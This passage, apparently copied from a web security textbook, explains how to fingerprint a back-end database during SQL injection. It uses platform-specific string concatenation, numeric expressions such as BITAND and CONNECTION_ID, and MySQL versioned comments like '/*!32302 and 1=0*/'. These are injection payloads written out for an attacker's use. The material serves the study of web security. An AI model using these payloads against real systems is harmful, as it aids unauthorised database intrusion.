Fingerprinting the Database

Most of the techniques described so far are effective against all of the common database platforms, and any divergences have been accommodated through minor adjustments to syntax. However, as we begin to look at more advanced exploitation techniques, the differences between platforms become more significant, and you will increasingly need to know which type of back-end data-base you are dealing with.

You have already seen how you can extract the version string of the major database types. Even if this cannot be done for some reason, it is usually possible to fingerprint the database using other methods. One of the most reliable is the different means by which databases concatenate strings. In a query where you control some item of string data, you can supply a particular value in one request and then test different methods of concatenation to produce that string. When the same results are obtained, you have probably identified the type of database being used. The following examples show how the string services could be constructed on the common types of database:

■ Oracle: ‘serv’||’ices’

■ MS-SQL: ‘serv’+’ices’

■ MySQL: ‘serv’ ‘ices’

[note the space]

If you are injecting into numeric data, then the following attack strings can be used to fingerprint the database. Each of these items will evaluate to 0 on the target database and generate an error on the other databases:
■ Oracle: BITAND(1,1)-BITAND(1,1)
■ MS-SQL: @@PACK_RECEIVED-@@PACK_RECEIVED
■ MySQL: CONNECTION_ID()-CONNECTION_ID()

A further point of interest when fingerprinting databases is the way in which MySQL handles certain types of inline comments. If a comment begins with the exclamation point character followed by a database version string, then the contents of the comment are interpreted as actual SQL, provided that the version of the actual database is equal to or later than that string; otherwise, the contents are ignored and treated as a comment. This facility can be used by programmers in a similar way to preprocessor directives in C, enabling them to write different code that will be processed conditionally upon the database version being used. It can also be used by an attacker to fin- gerprint the exact version of the database. For example, injecting the following string will cause the WHERE clause of a SELECT statement to be false if the MySQL version in use is greater than or equal to 3.23.02:

/*!32302 and 1=0*/


NEXT is..Extracting Useful Data..,.,,